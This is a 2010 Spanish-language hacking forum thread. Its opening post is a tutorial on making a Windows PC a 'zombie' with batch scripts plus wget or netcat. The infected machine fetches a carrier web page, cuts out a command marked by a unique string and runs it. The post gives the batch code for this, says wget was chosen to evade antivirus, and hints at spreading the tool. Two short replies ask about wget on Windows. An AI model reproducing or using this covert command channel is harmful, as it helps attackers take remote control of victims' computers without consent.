elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Subyugar un pc con archivos por lotes
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Subyugar un pc con archivos por lotes  (Leído 3,763 veces)
LauBuru

Desconectado Desconectado

Mensajes: 37


Ver Perfil
Subyugar un pc con archivos por lotes
« en: 18 Marzo 2010, 14:29 pm »

Bueno me e animado a subir este pequeño manual para volver "zombi" cualquier ordenado y que ejecute nuestras ordenes lo que denominare (ya que no se su denominacion tecnica) una conexion indirecta ya que nosotros dejaremos la orden en un sitio y el zombi la recogera y ejecutara, aviso que todo lo hago con batch + wget , inicialmente lo codifique utilizando netcat pero para llamar menos la atencion de los AV lo recodifique con wget


Bueno basicamente es aprovechar cualquier campo fijo (pero actualizable) para poner nuestro comando, para poder aislar la linea que contiene nuestro comando deberemos añadir una cadena singular usease una cadena unica que no se repita en el codigo fuente de la pagina a la que llamaremos

Explicare la manera de hacerlo con Netcat tmb para quede completo XD!!

Si utilizamos netcat deveremos guardar la URL en una variable <<EXCLUIENDO los caracteres ( & ) importante!! >>

Si la URL seleccionada tuviera dichos caracteres separariamos la URL en diferentes variables



Código:
http://webPortadora/campo/archivo.html


Esta URL se podria directamente en una variable



Código
  1. set "URL=http://webPortadora/campo/archivo.html"


Esta otra URL habria que separarla

Código:

Código:
http://webPortadora/index.php?id=1&u=10&z=3


Dejandola en tres variables

Código:

Código
  1. set "url1=http://webPortadora/index.php?id=1"
  2. set "url2=u=10"
  3. set "url3=z=3"


Una vez tenemos la url dentro de una variable realizamos la peticion de la pag y aislamos la linea que nos interesa utilizando la cadena singular, recordais ... Cheesy



Código
  1. echo GET %URL%| nc -vn IP(webportadora) 80 | find "CadenaSingular"
  2. o
  3. echo GET "%url1%&%url2%&%url3%" | nc -vn IP(webportadora) 80 | find "CadenaSingular"


Por precaucion contra lammers dire que este code deberia encerrarse dentro de un FOR /F  para poder meter el resultado de la salida del COMANDO en una variable

Como la linea de la pagina a la que llamamos aparte de nuestro codigo tmb tiene su propio codigo html tendremos que recortarle los extremos a la variable tal que asi

Código:

 
Código
  1. set resultado=%resultado:~X,-Y%



Donde (X) seria el cacho que quitamos al principio y (-Y) seria el cacho que le comeremos al final una vez que tenemos el comando en una variable ejecutarlo es una cosa trivial

Con WGET la cosa es casi iwal con la excepcion de que wget guarda el resultado en un archivo el cual llamamos con un FOR /F y guardamos el resultado de la salida en la variable, la recortamos y ya tenemos el comando
nuevamente listo para que lo ejecutemos.


Imaginad con un buen metodo de propagacion .......


Espero os haya servido de algo :)

Un saludo  ;D


« Última modificación: 18 Marzo 2010, 14:31 pm por LauBuru » En línea

69696969 start notepad.exe ::
selto

Desconectado Desconectado

Mensajes: 32



Ver Perfil
Re: Subyugar un pc con archivos por lotes
« Respuesta #1 en: 2 Junio 2010, 01:35 am »

Muy bueno, pero si no lo tengo mal entendido el wget en linux sirve para descargar de una url determinada, ¿pero sigue siendo el mismo en windows? estaba pensando en algo similar pero por ftp.

Gracias
En línea

SELTO
dArKo2

Desconectado Desconectado

Mensajes: 59



Ver Perfil
Re: Subyugar un pc con archivos por lotes
« Respuesta #2 en: 7 Junio 2010, 04:44 am »

segun recuerdo en windows se puede usar un comando que realiza una funcion parecida a la de wget....pero ahora no recuerdo cual
En línea

"We seek only reprieve and welcome the darkness"
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con dos ejercicios de ficheros por lotes
Ejercicios
qtall72 1 5,235 Último mensaje 14 Noviembre 2011, 23:53 pm
por qtall72
Archivos por lotes. BAT para descubriri la clave de dominio.
Windows
P3NDULO 1 1,968 Último mensaje 26 Diciembre 2013, 22:53 pm
por P3NDULO
ayudar con lotes
Scripting
thexmachine 0 2,023 Último mensaje 8 Junio 2015, 20:17 pm
por thexmachine
colocar contraseña a varios archivos pdf (por lotes)
Seguridad
rochro 2 4,601 Último mensaje 16 Junio 2015, 19:08 pm
por andavid
Codificador para archivos por lotes
Software
Aspidiske 0 1,235 Último mensaje 8 Octubre 2017, 18:33 pm
por Aspidiske
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines